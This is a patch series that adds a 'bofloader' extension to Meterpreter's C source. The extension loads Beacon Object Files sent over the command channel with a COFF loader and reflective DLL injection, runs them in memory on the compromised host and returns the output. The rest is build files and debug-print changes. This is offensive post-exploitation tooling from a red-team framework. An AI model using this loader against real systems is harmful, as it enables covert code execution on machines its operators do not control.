+DWORD InitServerExtension(MetApi* api, Remote* remote) +{ + met_api = api; + SET_LOGGING_CONTEXT(api) + + dprintf("[KIWI] Init server extension - initorclean"); + mimikatz_initOrClean(TRUE); + + dprintf("[KIWI] Init server extension - register"); + met_api->command.register_all(customCommands); + + + return ERROR_SUCCESS; +} + +/*! + * @brief Deinitialize the server extension. + * @param remote Pointer to the remote instance. + * @return Indication of success or failure. + */ +DWORD DeinitServerExtension(Remote *remote) +{ + met_api->command.deregister_all(customCommands); + + return ERROR_SUCCESS; +} + +/*! + * @brief Do a stageless initialisation of the extension. + * @param ID of the extension that the init was intended for. + * @param buffer Pointer to the buffer that contains the init data. + * @param bufferSize Size of the \c buffer parameter. + * @return Indication of success or failure. + */ +DWORD StagelessInit(UINT extensionId, const LPBYTE buffer, DWORD bufferSize) +{ + return ERROR_SUCCESS; +} + +/*! + * @brief Callback for when a command has been added to the meterpreter instance. + * @param commandId The ID of the command that has been added. + */ +VOID CommandAdded(UINT commandId) +{ +} diff --git a/c/meterpreter/source/extensions/bofloader/main.h b/c/meterpreter/source/extensions/bofloader/main.h new file mode 100644 index 00000000..92396e5f --- /dev/null +++ b/c/meterpreter/source/extensions/bofloader/main.h @@ -0,0 +1,15 @@ +/*! + * @file main.h + * @brief TLV related bits for the KIWI extension. + */ +#ifndef _METERPRETER_SOURCE_EXTENSION_BOF_BOF_H +#define _METERPRETER_SOURCE_EXTENSION_BOF_BOF_H + +#include "../../common/common.h" + +#define TLV_TYPE_EXTENSION_BOF 0 + +#define TLV_TYPE_BOFLOADER_CMD MAKE_CUSTOM_TLV(TLV_META_TYPE_RAW, TLV_TYPE_EXTENSION_BOF, TLV_EXTENSIONS + 100) +#define TLV_TYPE_BOFLOADER_CMD_RESULT MAKE_CUSTOM_TLV(TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_BOF, TLV_EXTENSIONS + 101) + +#endif From 35f950b4d231ab27d8b718c61cbf49121183e950 Mon Sep 17 00:00:00 2001 From: joe Date: Sat, 3 Sep 2022 16:35:44 -0400 Subject: [PATCH 02/17] wip++ hopefully working c portion --- .../source/common/common_command_ids.h | 1 + .../bofloader/COFFLoader/COFFLoader.c | 19 ++++++- .../COFFLoader/beacon_compatibility.c | 4 ++ .../source/extensions/bofloader/main.c | 57 ++++++++++++------- .../source/extensions/bofloader/main.h | 2 +- c/meterpreter/workspace/CMakeLists.txt | 6 ++ .../ext_server_bofloader/CMakeLists.txt | 48 ++++++++++++++++ 7 files changed, 113 insertions(+), 24 deletions(-) create mode 100644 c/meterpreter/workspace/ext_server_bofloader/CMakeLists.txt diff --git a/c/meterpreter/source/common/common_command_ids.h b/c/meterpreter/source/common/common_command_ids.h index 4c4280a1..74507dcc 100755 --- a/c/meterpreter/source/common/common_command_ids.h +++ b/c/meterpreter/source/common/common_command_ids.h @@ -230,5 +230,6 @@ #define COMMAND_ID_LANATTACKS_STOP_TFTP 15009 #define COMMAND_ID_PEINJECTOR_INJECT_SHELLCODE 16001 #define COMMAND_ID_MIMIKATZ_CUSTOM_COMMAND 17001 +#define COMMAND_ID_BOFLOADER_EXEC_CMD 18001 #endif diff --git a/c/meterpreter/source/extensions/bofloader/COFFLoader/COFFLoader.c b/c/meterpreter/source/extensions/bofloader/COFFLoader/COFFLoader.c index 5a7e6703..c039027d 100644 --- a/c/meterpreter/source/extensions/bofloader/COFFLoader/COFFLoader.c +++ b/c/meterpreter/source/extensions/bofloader/COFFLoader/COFFLoader.c @@ -16,7 +16,6 @@ #endif #include "COFFLoader.h" - /* Enable or disable debug output if testing or adding new relocation types */ #ifdef DEBUG #define DEBUG_PRINT(x, ...) printf(x, ##__VA_ARGS__) @@ -57,6 +56,9 @@ unsigned char *unhexlify(unsigned char *value, int *outlen) } counter2 = 0; + #pragma warning(push) + #pragma warning(disable:4018) + #pragma warning(disable:4244) for (counter = 0; counter < strlen((char *)value); counter += 2) { memcpy(byteval, value + counter, 2); @@ -65,11 +67,13 @@ unsigned char *unhexlify(unsigned char *value, int *outlen) counter2++; } *outlen = counter2; - + #pragma warning(pop) errcase: return retval; } + + /* Helper to just get the contents of a file, used for testing. Real * implementations of this in an agent would use the tasking from the * C2 server for this */ @@ -95,7 +99,10 @@ unsigned char *getContents(char *filepath, uint32_t *outsize) return NULL; } memset(tempbuffer, 0, fsize); + #pragma warning(push) + #pragma warning(disable:4267) readsize = fread(tempbuffer, 1, fsize, fin); + #pragma warning(pop) fclose(fin); buffer = calloc(readsize, 1); @@ -314,6 +321,8 @@ int RunCOFF(char *functionname, unsigned char *coff_data, uint32_t filesize, uns functionMapping = VirtualAlloc(NULL, 2048, MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_READWRITE); #endif #endif + #pragma warning(push) + #pragma warning(disable:4244) /* Start parsing the relocations, and *hopefully* handle them correctly. */ for (counter = 0; counter < coff_header_ptr->NumberOfSections; counter++) @@ -377,6 +386,7 @@ int RunCOFF(char *functionname, unsigned char *coff_data, uint32_t filesize, uns offsetvalue += (sectionMapping[coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].SectionNumber - 1] - (sectionMapping[counter] + coff_reloc_ptr->VirtualAddress + 4)); DEBUG_PRINT("\t\tRelative address: 0x%X\n", offsetvalue); memcpy(sectionMapping[counter] + coff_reloc_ptr->VirtualAddress, &offsetvalue, sizeof(uint32_t)); + #pragma warning(pop) } else { @@ -436,7 +446,10 @@ int RunCOFF(char *functionname, unsigned char *coff_data, uint32_t filesize, uns goto cleanup; } DEBUG_PRINT("\t\tReadin offset value: 0x%X\n", offsetvalue); + #pragma warning(push) + #pragma warning(disable:4244) offsetvalue += (sectionMapping[coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].SectionNumber - 1] - (sectionMapping[counter] + coff_reloc_ptr->VirtualAddress + 4)); + #pragma warning(pop) DEBUG_PRINT("\t\tRelative address: 0x%X\n", offsetvalue); memcpy(sectionMapping[counter] + coff_reloc_ptr->VirtualAddress, &offsetvalue, sizeof(uint32_t)); } @@ -511,6 +524,7 @@ int RunCOFF(char *functionname, unsigned char *coff_data, uint32_t filesize, uns #endif return 1; } + #pragma warning(disable:4018) DEBUG_PRINT("Symbols:\n"); for (tempcounter = 0; tempcounter < coff_header_ptr->NumberOfSymbols; tempcounter++) @@ -522,6 +536,7 @@ int RunCOFF(char *functionname, unsigned char *coff_data, uint32_t filesize, uns #ifdef _WIN32 /* So for some reason VS 2017 doesn't like this, but char* casting works, so just going to do that */ #ifdef _MSC_VER + #pragma warning(disable:4047) foo = (char *)(sectionMapping[coff_sym_ptr[tempcounter].SectionNumber - 1] + coff_sym_ptr[tempcounter].Value); #else foo = (void (*)(char *, unsigned long))(sectionMapping[coff_sym_ptr[tempcounter].SectionNumber - 1] + coff_sym_ptr[tempcounter].Value); diff --git a/c/meterpreter/source/extensions/bofloader/COFFLoader/beacon_compatibility.c b/c/meterpreter/source/extensions/bofloader/COFFLoader/beacon_compatibility.c index 079b00cf..728d8044 100644 --- a/c/meterpreter/source/extensions/bofloader/COFFLoader/beacon_compatibility.c +++ b/c/meterpreter/source/extensions/bofloader/COFFLoader/beacon_compatibility.c @@ -291,6 +291,8 @@ void BeaconGetSpawnTo(BOOL x86, char* buffer, int length) { } if (x86) { tempBufferPath = "C:\\Windows\\"X86PATH"\\"DEFAULTPROCESSNAME; + #pragma warning(push) + #pragma warning(disable:4018) if (strlen(tempBufferPath) > length) { return; } @@ -304,6 +306,8 @@ void BeaconGetSpawnTo(BOOL x86, char* buffer, int length) { memcpy(buffer, tempBufferPath, strlen(tempBufferPath)); } + #pragma warning(pop) + return; } diff --git a/c/meterpreter/source/extensions/bofloader/main.c b/c/meterpreter/source/extensions/bofloader/main.c index 61a10053..d4e490a1 100644 --- a/c/meterpreter/source/extensions/bofloader/main.c +++ b/c/meterpreter/source/extensions/bofloader/main.c @@ -1,10 +1,12 @@ /*! * @file main.c - * @brief Entry point for the kiwi extension. + * @brief Entry point for the bofloader extension. */ #include "common.h" #include "common_metapi.h" +#include +#include "main.h" // Required so that use of the API works. MetApi* met_api = NULL; @@ -12,12 +14,11 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" -#include "main.h" - +typedef int (*goCallback)(char *, int); extern int LoadAndRun(char *argsBuffer, uint32_t bufferSize, goCallback callback); +extern char * BeaconGetOutputData(int *outsize); DWORD request_exec_cmd(Remote *remote, Packet *packet); -//DWORD request_kerberos_ticket_use(Remote *remote, Packet *packet); /*! @brief The enabled commands for this extension. */ Command customCommands[] = @@ -32,38 +33,56 @@ Command customCommands[] = * @param packet Pointer to the incoming packet. * @returns \c ERROR_SUCCESS */ + DWORD request_exec_cmd(Remote *remote, Packet *packet) { DWORD result = ERROR_SUCCESS; + int outdata_size = 0; + DWORD buffer_size = 0; Packet * response = met_api->packet.create_response(packet); + char * output_data = NULL; + char * args_buffer = NULL; - wchar_t* cmd = met_api->packet.get_tlv_value_wstring(packet, TLV_TYPE_BOFLOADER_CMD); - if (cmd != NULL) + if (NULL == response) { - dprintf("[BOF] Executing command: %S", cmd); + met_api->packet.destroy(response); + return ERROR_OUTOFMEMORY; + } - // While this implies that powershell is in use, this is just a naming thing, - // it's not actually using powershell. - wchar_t* output = powershell_reflective_mimikatz(cmd); - dprintf("[BOF] Executed command: %S", cmd); - if (output != NULL) + buffer_size = packet->payloadLength; + args_buffer = (char *) met_api->packet.get_tlv_value_raw(packet, TLV_TYPE_BOFLOADER_CMD_EXEC, &buffer_size); + + if (args_buffer != NULL) + { + + if (LoadAndRun(args_buffer, (uint32_t)buffer_size, NULL)) { - met_api->packet.add_tlv_wstring(response, TLV_TYPE_KIWI_CMD_RESULT, output); + result = ERROR_BAD_COMMAND; } else { - result = ERROR_OUTOFMEMORY; + output_data = BeaconGetOutputData(&outdata_size); } - //LocalFree(cmd); + + if (output_data) + { + met_api->packet.add_tlv_string(response, TLV_TYPE_BOFLOADER_CMD_RESULT, output_data); + } + } else { result = ERROR_INVALID_PARAMETER; } - dprintf("[KIWI] Dumped, transmitting response."); + dprintf("[BOFLOADER] Finished executing, if success will recv output data."); met_api->packet.transmit_response(result, remote, response); - dprintf("[KIWI] Done."); + + if (NULL != response) + met_api->packet.destroy(response); + if (NULL != packet) + met_api->packet.destroy(packet); + dprintf("[BOFLOADER] Done."); return ERROR_SUCCESS; } @@ -79,10 +98,6 @@ DWORD InitServerExtension(MetApi* api, Remote* remote) met_api = api; SET_LOGGING_CONTEXT(api) - dprintf("[KIWI] Init server extension - initorclean"); - mimikatz_initOrClean(TRUE); - - dprintf("[KIWI] Init server extension - register"); met_api->command.register_all(customCommands); diff --git a/c/meterpreter/source/extensions/bofloader/main.h b/c/meterpreter/source/extensions/bofloader/main.h index 92396e5f..3ebc02f8 100644 --- a/c/meterpreter/source/extensions/bofloader/main.h +++ b/c/meterpreter/source/extensions/bofloader/main.h @@ -9,7 +9,7 @@ #define TLV_TYPE_EXTENSION_BOF 0 -#define TLV_TYPE_BOFLOADER_CMD MAKE_CUSTOM_TLV(TLV_META_TYPE_RAW, TLV_TYPE_EXTENSION_BOF, TLV_EXTENSIONS + 100) +#define TLV_TYPE_BOFLOADER_CMD_EXEC MAKE_CUSTOM_TLV(TLV_META_TYPE_RAW, TLV_TYPE_EXTENSION_BOF, TLV_EXTENSIONS + 100) #define TLV_TYPE_BOFLOADER_CMD_RESULT MAKE_CUSTOM_TLV(TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_BOF, TLV_EXTENSIONS + 101) #endif diff --git a/c/meterpreter/workspace/CMakeLists.txt b/c/meterpreter/workspace/CMakeLists.txt index a1f35a45..d941ea10 100644 --- a/c/meterpreter/workspace/CMakeLists.txt +++ b/c/meterpreter/workspace/CMakeLists.txt @@ -30,6 +30,8 @@ option(BUILD_EXT_LANATTACKS "Build the LANATTACKS extension" OFF) option(BUILD_EXT_PYTHON "Build the PYTHON extension" OFF) option(BUILD_EXT_POWERSHELL "Build the POWERSHELL extension" OFF) option(BUILD_EXT_PEINJECTOR "Build the PEINJECTOR extension" OFF) +option(BUILD_EXT_BOFLOADER "Build the BOFLOADER extension" OFF) + if(BUILD_ALL) set(BUILD_LIB_JPEG ON) @@ -51,6 +53,7 @@ if(BUILD_EXT_ALL) set(BUILD_EXT_PYTHON ON) set(BUILD_EXT_POWERSHELL ON) set(BUILD_EXT_PEINJECTOR ON) + set(BUILD_EXT_BOFLOADER ON) endif() if(BUILD_EXT_ESPIA) @@ -178,6 +181,9 @@ endif() if(BUILD_EXT_PEINJECTOR) set(MET_EXTENSIONS ${MET_EXTENSIONS} ext_server_peinjector) endif() +if(BUILD_EXT_BOFLOADER) + set(MET_EXTENSIONS ${MET_EXTENSIONS} ext_server_bofloader) +endif() if(BUILD_EXT_SNIFFER) if(MSVC) diff --git a/c/meterpreter/workspace/ext_server_bofloader/CMakeLists.txt b/c/meterpreter/workspace/ext_server_bofloader/CMakeLists.txt new file mode 100644 index 00000000..5aa8c130 --- /dev/null +++ b/c/meterpreter/workspace/ext_server_bofloader/CMakeLists.txt @@ -0,0 +1,48 @@ +set(PROJECT_NAME ext_server_bofloader) + +project(${PROJECT_NAME} C) + +include(${CMAKE_CURRENT_SOURCE_DIR}/../CMakeListsFuncs.txt) + +add_definitions( + -D_CRT_SECURE_NO_WARNINGS +) + +if(MSVC) + set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} /MP") +endif() + +include_directories(../../source/common) +include_directories(../../source/ReflectiveDLLInjection/common) + +set(SRC_DIR ../../source/extensions/bofloader) + +# Unfortunately we have to be a little judicious with what we include +set(SRC_FILES + ${SRC_DIR}/main.c + ${SRC_DIR}/COFFLoader/beacon_compatibility.c + ${SRC_DIR}/COFFLoader/COFFLoader.c + ${MOD_DEF_DIR}/extension.def +) + +foreach(srcfile SRC_FILES) + message(STATUS srcfile) +endforeach(SRC_FILES) + + +add_library(${PROJECT_NAME} SHARED ${SRC_FILES}) +set_target_properties(${PROJECT_NAME} PROPERTIES OUTPUT_NAME ${PROJECT_NAME}.${TARGET_ARCH}) + +if(MSVC) + set_target_properties(${PROJECT_NAME} PROPERTIES LINK_FLAGS "/DEF:\"${MOD_DEF_DIR}/extension.def\"") + set_source_files_properties(${MOD_DEF_DIR}/extension.def PROPERTIES HEADER_FILE_ONLY TRUE) +endif() + +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +if(MSVC) + target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") +endif() + +# Post processing (required for all Meterpreter DLLs) +editbin(${PROJECT_NAME} ${BIN_SUBSYSTEM}) +copyoutput(${PROJECT_NAME} ${BIN_OUTPUT_DIR}) From 5de520f527945c6fd29fdca8fdc64e40b6cb95bc Mon Sep 17 00:00:00 2001 From: joe Date: Sun, 4 Sep 2022 19:28:41 -0400 Subject: [PATCH 03/17] bofloader nocrash --- .../source/extensions/bofloader/main.c | 28 ++++++++++++------- 1 file changed, 18 insertions(+), 10 deletions(-) diff --git a/c/meterpreter/source/extensions/bofloader/main.c b/c/meterpreter/source/extensions/bofloader/main.c index d4e490a1..955b0532 100644 --- a/c/meterpreter/source/extensions/bofloader/main.c +++ b/c/meterpreter/source/extensions/bofloader/main.c @@ -7,13 +7,14 @@ #include "common_metapi.h" #include #include "main.h" - +#include "stdlib.h" // Required so that use of the API works. MetApi* met_api = NULL; - +#define DEBUGTRACE 1 #define RDIDLL_NOEXPORT #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" + typedef int (*goCallback)(char *, int); extern int LoadAndRun(char *argsBuffer, uint32_t bufferSize, goCallback callback); extern char * BeaconGetOutputData(int *outsize); @@ -43,6 +44,7 @@ DWORD request_exec_cmd(Remote *remote, Packet *packet) char * output_data = NULL; char * args_buffer = NULL; + real_dprintf("[BOFLOADER] Inside request cmd\n"); if (NULL == response) { met_api->packet.destroy(response); @@ -51,16 +53,19 @@ DWORD request_exec_cmd(Remote *remote, Packet *packet) buffer_size = packet->payloadLength; args_buffer = (char *) met_api->packet.get_tlv_value_raw(packet, TLV_TYPE_BOFLOADER_CMD_EXEC, &buffer_size); + real_dprintf("[BOFLOADER] got pkt contents\n"); if (args_buffer != NULL) { - + real_dprintf("[BOFLOADER] calling load and run\n"); if (LoadAndRun(args_buffer, (uint32_t)buffer_size, NULL)) { + real_dprintf("[BOFLOADER] load and run failed\n"); result = ERROR_BAD_COMMAND; } else { + real_dprintf("[BOFLOADER] getting out data\n"); output_data = BeaconGetOutputData(&outdata_size); } @@ -68,21 +73,24 @@ DWORD request_exec_cmd(Remote *remote, Packet *packet) { met_api->packet.add_tlv_string(response, TLV_TYPE_BOFLOADER_CMD_RESULT, output_data); } - } else { result = ERROR_INVALID_PARAMETER; } - dprintf("[BOFLOADER] Finished executing, if success will recv output data."); + real_dprintf("[BOFLOADER] Finished executing, if success will recv output data."); met_api->packet.transmit_response(result, remote, response); + real_dprintf("[BOFLOADER] response sent"); - if (NULL != response) +//FIXME -- freeing the memory crashes meterpreter sessions +#if 0 + if (response) met_api->packet.destroy(response); - if (NULL != packet) - met_api->packet.destroy(packet); - dprintf("[BOFLOADER] Done."); + if (packet) + met_api->packet.destroy(response); +#endif + real_dprintf("[BOFLOADER] Done."); return ERROR_SUCCESS; } @@ -93,11 +101,11 @@ DWORD request_exec_cmd(Remote *remote, Packet *packet) * @param remote Pointer to the remote instance. * @return Indication of success or failure. */ + DWORD InitServerExtension(MetApi* api, Remote* remote) { met_api = api; SET_LOGGING_CONTEXT(api) - met_api->command.register_all(customCommands); From 35d3dc073765465732fb40a88944ea5eb40c9a37 Mon Sep 17 00:00:00 2001 From: joe Date: Sun, 4 Sep 2022 19:40:53 -0400 Subject: [PATCH 04/17] debugtrace --- c/meterpreter/source/extensions/bofloader/main.c | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/c/meterpreter/source/extensions/bofloader/main.c b/c/meterpreter/source/extensions/bofloader/main.c index 955b0532..3d89eaa4 100644 --- a/c/meterpreter/source/extensions/bofloader/main.c +++ b/c/meterpreter/source/extensions/bofloader/main.c @@ -7,10 +7,9 @@ #include "common_metapi.h" #include #include "main.h" -#include "stdlib.h" + // Required so that use of the API works. MetApi* met_api = NULL; -#define DEBUGTRACE 1 #define RDIDLL_NOEXPORT #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" From b05945da8a1b6c290ce4ccb9fa8be369450b8ecc Mon Sep 17 00:00:00 2001 From: joe Date: Sun, 4 Sep 2022 20:02:20 -0400 Subject: [PATCH 05/17] no need to free mem, meterpreter takes care of it --- c/meterpreter/source/extensions/bofloader/main.c | 10 +--------- 1 file changed, 1 insertion(+), 9 deletions(-) diff --git a/c/meterpreter/source/extensions/bofloader/main.c b/c/meterpreter/source/extensions/bofloader/main.c index 3d89eaa4..ee8ffe87 100644 --- a/c/meterpreter/source/extensions/bofloader/main.c +++ b/c/meterpreter/source/extensions/bofloader/main.c @@ -80,15 +80,7 @@ DWORD request_exec_cmd(Remote *remote, Packet *packet) real_dprintf("[BOFLOADER] Finished executing, if success will recv output data."); met_api->packet.transmit_response(result, remote, response); - real_dprintf("[BOFLOADER] response sent"); - -//FIXME -- freeing the memory crashes meterpreter sessions -#if 0 - if (response) - met_api->packet.destroy(response); - if (packet) - met_api->packet.destroy(response); -#endif + real_dprintf("[BOFLOADER] Done."); return ERROR_SUCCESS; From 9412beeef402d0e8a987127231ac1d700af02dd3 Mon Sep 17 00:00:00 2001 From: joe Date: Mon, 5 Sep 2022 20:14:11 -0400 Subject: [PATCH 06/17] dprintf --- c/meterpreter/source/extensions/bofloader/main.c | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/c/meterpreter/source/extensions/bofloader/main.c b/c/meterpreter/source/extensions/bofloader/main.c index ee8ffe87..9bc157e6 100644 --- a/c/meterpreter/source/extensions/bofloader/main.c +++ b/c/meterpreter/source/extensions/bofloader/main.c @@ -43,7 +43,7 @@ DWORD request_exec_cmd(Remote *remote, Packet *packet) char * output_data = NULL; char * args_buffer = NULL; - real_dprintf("[BOFLOADER] Inside request cmd\n"); + dprintf("[BOFLOADER] Inside request cmd\n"); if (NULL == response) { met_api->packet.destroy(response); @@ -52,19 +52,19 @@ DWORD request_exec_cmd(Remote *remote, Packet *packet) buffer_size = packet->payloadLength; args_buffer = (char *) met_api->packet.get_tlv_value_raw(packet, TLV_TYPE_BOFLOADER_CMD_EXEC, &buffer_size); - real_dprintf("[BOFLOADER] got pkt contents\n"); + dprintf("[BOFLOADER] got pkt contents\n"); if (args_buffer != NULL) { - real_dprintf("[BOFLOADER] calling load and run\n"); + dprintf("[BOFLOADER] calling load and run\n"); if (LoadAndRun(args_buffer, (uint32_t)buffer_size, NULL)) { - real_dprintf("[BOFLOADER] load and run failed\n"); + dprintf("[BOFLOADER] load and run failed\n"); result = ERROR_BAD_COMMAND; } else { - real_dprintf("[BOFLOADER] getting out data\n"); + dprintf("[BOFLOADER] getting out data\n"); output_data = BeaconGetOutputData(&outdata_size); } @@ -78,10 +78,10 @@ DWORD request_exec_cmd(Remote *remote, Packet *packet) result = ERROR_INVALID_PARAMETER; } - real_dprintf("[BOFLOADER] Finished executing, if success will recv output data."); + dprintf("[BOFLOADER] Finished executing, if success will recv output data."); met_api->packet.transmit_response(result, remote, response); - real_dprintf("[BOFLOADER] Done."); + dprintf("[BOFLOADER] Done."); return ERROR_SUCCESS; } From 00aea8da1a5f66dc371f9bf8a34049107afd0577 Mon Sep 17 00:00:00 2001 From: joe Date: Tue, 6 Sep 2022 21:04:39 -0400 Subject: [PATCH 07/17] visualstudio builds --- .../ext_server_bofloader.vcxproj | 476 ++++++++++++++++++ c/meterpreter/workspace/meterpreter.sln | 164 +++++- 2 files changed, 639 insertions(+), 1 deletion(-) create mode 100644 c/meterpreter/workspace/ext_server_bofloader/ext_server_bofloader.vcxproj diff --git a/c/meterpreter/workspace/ext_server_bofloader/ext_server_bofloader.vcxproj b/c/meterpreter/workspace/ext_server_bofloader/ext_server_bofloader.vcxproj new file mode 100644 index 00000000..0427f0b1 --- /dev/null +++ b/c/meterpreter/workspace/ext_server_bofloader/ext_server_bofloader.vcxproj @@ -0,0 +1,476 @@ + + + + + Debug + Win32 + + + Debug + x64 + + + r7_release + Win32 + + + r7_release + x64 + + + Release + Win32 + + + Release + x64 + + + + + + + + + + + + + + + {486B160F-C571-486D-AAC3-CB60CEA7CBDD} + ext_server_incognito + Win32Proj + ext_server_bofloader + + + + DynamicLibrary + MultiByte + false + v141_xp + + + DynamicLibrary + MultiByte + false + v141_xp + + + DynamicLibrary + MultiByte + false + v141_xp + + + DynamicLibrary + MultiByte + false + v141_xp + + + DynamicLibrary + MultiByte + false + v141_xp + + + DynamicLibrary + MultiByte + false + v141_xp + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + <_ProjectFileVersion>10.0.30319.1 + $(Configuration)\$(Platform)\ + $(Configuration)\$(Platform)\ + false + false + false + false + AllRules.ruleset + + + $(ProjectName).$(PlatformShortName) + + + + MaxSpeed + OnlyExplicitInline + false + Size + ..\..\source\ReflectiveDLLInjection\common;..\..\source\common;%(AdditionalIncludeDirectories) + _CRT_SECURE_NO_WARNINGS;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions) + true + MultiThreaded + false + NotUsing + $(OutDir)\ + $(OutDir)\ + $(OutDir)\ + Level3 + ProgramDatabase + false + true + true + true + Async + + + %(AdditionalDependencies) + %(AdditionalLibraryDirectories) + + + false + false + + + Windows + + + + + false + + + $(OutDir)\ext_server_incognito.lib + MachineX86 + false + + + $(ProjectDir)..\..\source\def\extension.def + /ignore:4070 %(AdditionalOptions) + + + + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" +copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + + + MaxSpeed + OnlyExplicitInline + false + Size + ..\..\source\ReflectiveDLLInjection\common;..\..\source\common;%(AdditionalIncludeDirectories) + _CRT_SECURE_NO_WARNINGS;DEBUGTRACE;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions) + true + MultiThreaded + false + NotUsing + $(OutDir)\ + $(OutDir)\ + $(OutDir)\ + Level3 + ProgramDatabase + false + true + true + true + Async + + + %(AdditionalDependencies) + %(AdditionalLibraryDirectories) + + + false + false + + + Windows + + + + + false + + + $(OutDir)\ext_server_incognito.lib + MachineX86 + false + + + $(ProjectDir)..\..\source\def\extension.def + /ignore:4070 %(AdditionalOptions) + + + + + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" +copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName).debug$(TargetExt)" + + + + + MaxSpeed + OnlyExplicitInline + false + Size + ..\..\source\ReflectiveDLLInjection\common;..\..\source\common;%(AdditionalIncludeDirectories) + _CRT_SECURE_NO_WARNINGS;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions) + true + MultiThreaded + false + NotUsing + $(OutDir)\ + $(OutDir)\ + $(OutDir)\ + Level3 + ProgramDatabase + false + true + true + true + Async + + + %(AdditionalDependencies) + %(AdditionalLibraryDirectories) + + + false + false + + + Windows + + + + + false + + + $(OutDir)\ext_server_incognito.lib + MachineX86 + false + + + $(ProjectDir)..\..\source\def\extension.def + /ignore:4070 %(AdditionalOptions) + + + + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" +copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + + + X64 + + + MinSpace + OnlyExplicitInline + false + Size + ..\..\source\ReflectiveDLLInjection\common;..\..\source\common;%(AdditionalIncludeDirectories) + _CRT_SECURE_NO_WARNINGS;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions) + true + MultiThreaded + false + NotUsing + $(OutDir)\ + $(OutDir)\ + $(OutDir)\ + Level3 + ProgramDatabase + false + true + true + true + Async + + + %(AdditionalDependencies) + + + + + false + false + + + Windows + + + + + false + + + $(OutDir)\ext_server_incognito.lib + MachineX64 + false + + + $(ProjectDir)..\..\source\def\extension.def + /ignore:4070 %(AdditionalOptions) + + + + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL +IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" +copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + + + X64 + + + MinSpace + OnlyExplicitInline + false + Size + ..\..\source\ReflectiveDLLInjection\common;..\..\source\common;%(AdditionalIncludeDirectories) + _CRT_SECURE_NO_WARNINGS;DEBUGTRACE;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions) + true + MultiThreaded + false + NotUsing + $(OutDir)\ + $(OutDir)\ + $(OutDir)\ + Level3 + ProgramDatabase + false + true + true + true + Async + + + %(AdditionalDependencies) + + + + + false + false + + + Windows + + + + + false + + + $(OutDir)\ext_server_incognito.lib + MachineX64 + false + + + $(ProjectDir)..\..\source\def\extension.def + /ignore:4070 %(AdditionalOptions) + + + + + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL +IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" +copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName).debug$(TargetExt)" + + + + + X64 + + + MinSpace + OnlyExplicitInline + false + Size + ..\..\source\ReflectiveDLLInjection\common;..\..\source\common;%(AdditionalIncludeDirectories) + _CRT_SECURE_NO_WARNINGS;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions) + true + MultiThreaded + false + NotUsing + $(OutDir)\ + $(OutDir)\ + $(OutDir)\ + Level3 + ProgramDatabase + false + true + true + true + Async + + + %(AdditionalDependencies) + + + + + false + false + + + Windows + + + + + false + + + $(OutDir)\ext_server_incognito.lib + MachineX64 + false + + + $(ProjectDir)..\..\source\def\extension.def + /ignore:4070 %(AdditionalOptions) + + + + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL +IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" +copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + + + + + + + + \ No newline at end of file diff --git a/c/meterpreter/workspace/meterpreter.sln b/c/meterpreter/workspace/meterpreter.sln index 99a626ec..c7d76e87 100644 --- a/c/meterpreter/workspace/meterpreter.sln +++ b/c/meterpreter/workspace/meterpreter.sln @@ -56,13 +56,13 @@ Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Common", "Common", "{EDE086 